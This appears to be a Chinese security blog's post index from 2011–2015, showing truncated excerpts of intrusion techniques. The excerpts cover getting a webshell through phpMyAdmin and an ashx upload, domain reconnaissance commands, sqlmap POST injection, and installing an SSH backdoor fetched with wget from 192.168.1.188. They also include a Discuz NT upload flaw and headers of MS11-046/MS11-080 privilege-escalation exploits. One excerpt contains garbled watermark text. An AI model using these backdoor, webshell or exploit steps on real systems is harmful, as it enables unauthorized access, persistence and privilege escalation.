2015年12月26日

phpmyadmin 各种技巧拿 webshell

摘要: site.com/phpMyAdminsite.com/sqlD:\wamp\www账号还有密码root 密码第一种CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL );INSERT INTO `mysql`.`darkmoon` ... 阅读全文

posted @ 2015-12-26 23:19 0xcc 阅读(3259) 评论(0) 推荐(0) 编辑

2013年4月1日

常用域渗透命令整理

摘要: 查询域管理员用户:net group “domain admins” /domain查询域用户:net user /domain查询域名称:net view /domain查询域内计算机:net view /domain:XX查询域控制器:net time /domain查询所有域控制器:dsquery server例:dsquery server -domain super.com | dsget server -dnsname -site (搜索域内所有域控制器并显示他们的DNS主机名和站点名称)查询域内计算机:dsquery computer例:dsquery computer doma 阅读全文

posted @ 2013-04-01 23:25 0xcc 阅读(518) 评论(0) 推荐(0) 编辑

VBS 发送邮件

摘要: function Send_mail(You_Account,You_Password,Send_Email,Send_Email2,Send_Topic,Send_Body,Send_Attachment)'code by NetPatch'VBS发送邮件参数说明'You_Account:你的邮件帐号'You_Password:你的邮件密码'Send_Email: 主要邮件地址'Send_Email2: 备用邮件地址'Send_Topic: 邮件主题'Send_Body: 邮件内容'Send_Attachment:邮件附 阅读全文

posted @ 2013-04-01 23:21 0xcc 阅读(297) 评论(0) 推荐(0) 编辑

2013年2月23日

sqlmap---post----注入

摘要: 先抓包http://zzzzz.com/xx/xx_list.asp?action=listbm=%C6%BD%C3%E6%B2=sss&xx=sss-------------------------------------------------------------------------------------------------------------------------------------sqlmap.py -u http://zzzzz.com/xx/xx_list.asp?action=list --data=bm=%C6%BD%C3%E6%B2sqlmap 阅读全文

posted @ 2013-02-23 00:51 0xcc 阅读(1764) 评论(0) 推荐(0) 编辑

2012年6月26日

ssh后门安装

摘要: 转载1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old3、下载并安装ssh后门:shell-# wget http://192.168.1.188/sshbd.tgzshell-# tar zxvf sshbd.tgzshell-# cd openssh4、设置ssh后门的登录密码:vi versio.h#define SSH_VERSION "OpenSSH_4.2" --> you've to edit Open 阅读全文

posted @ 2012-06-26 08:42 0xcc 阅读(339) 评论(0) 推荐(0) 编辑

2012年5月8日

Discuz NT多个版本文件上传漏洞

摘要: http://whhacker.blog.51cto.com/298713/856639Discuz NT多个版本文件上传漏洞文章作者:rebeyond信息来源:邪恶八进制信息安全团队(www.eviloctal.com)注:文章首发I.S.T.O信息安全团队,后由原创作者友情提交到邪恶八进制信息安全团队技术讨论组。I.S.T.O版权所有,转载需注明作者。受影响版本:貌似都受影响。漏洞文件:tools/ajax.aspx 漏洞分析:这个页面里的ajax请求,都没有进行权限的验证,游客权限就可以调用其中的所有方法,很危险的写法,于是有了下面的漏洞。 当filename和upload两个参数同.. 阅读全文

posted @ 2012-05-08 19:56 0xcc 阅读(335) 评论(0) 推荐(0) 编辑

2011年12月6日

MS11-046

摘要: /** 触发MS11-046* 来源:azy,http://hi.baidu.com/azy0922/blog/item/053065d197cebfca572c8492.html* 改编:KiDebug,Google@pku.edu.cn* 编译:VC6.0* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户 and webshell*/#include <stdio.h>#include <Winsock2.h>#include <windows.h>#include <lm.h>#pragma comm 阅读全文

posted @ 2011-12-06 11:16 0xcc 阅读(557) 评论(0) 推荐(0) 编辑

MS11-080

摘要: /** MS11-080 Afd.sys Privilege Escalation Exploit* 来源:Matteo Memelli,http://www.exploit-db.com/exploits/18176/* 改编:KiDebug,Google@pku.edu.cn* 编译:VC6.0* 测试环境:原版Windows XP SP3,Windows 2003 SP2,普通用户 and webshell*/#include <stdio.h>#include <Winsock2.h>#include <windows.h>#include < 阅读全文

posted @ 2011-12-06 11:16 0xcc 阅读(1171) 评论(0) 推荐(0) 编辑

2011年11月30日

ashx 脚本拿shell

摘要: 该方法是利用在一些比较BT的上传上面如果ewebeditor过滤了asa,cer,cdx,php,aspx等脚本类型的上传情况下添加一个ashx的上传类型,上传一个ashx脚本上去,脚本内容如下:<%@ WebHandler Language="C#" Class="Handler" %>using System;using System.Web;using System.IO;public class Handler : IHttpHandler {public void ProcessRequest (HttpContext contex 阅读全文

posted @ 2011-11-30 15:33 0xcc 阅读(370) 评论(0) 推荐(0) 编辑

2011年11月26日

基于sqlinjection,介绍一些注射技巧

摘要: 转自T00LS http://www.t00ls.net/thread-17035-1-1.html 传统的检测注射方法是通过:- 低调求发展% [. _. Y8 s0 X' v t0 bT00LS9 l- O b/ {/ o+ k6 nand 1=1 , and 1=2 来判断真假从而判断是否过滤完全,当然,也有 or 1=2,or 1=1,或者 id=1+1 或id=2-1,等等- 低调求发展! r( s2 G* k- J; p& z值相信大家不陌生吧,可这么用: and 1 is null,and 1 is not null T00LS+ b& ^7 q9 I, 阅读全文

posted @ 2011-11-26 14:10 0xcc 阅读(481) 评论(0) 推荐(0) 编辑

导航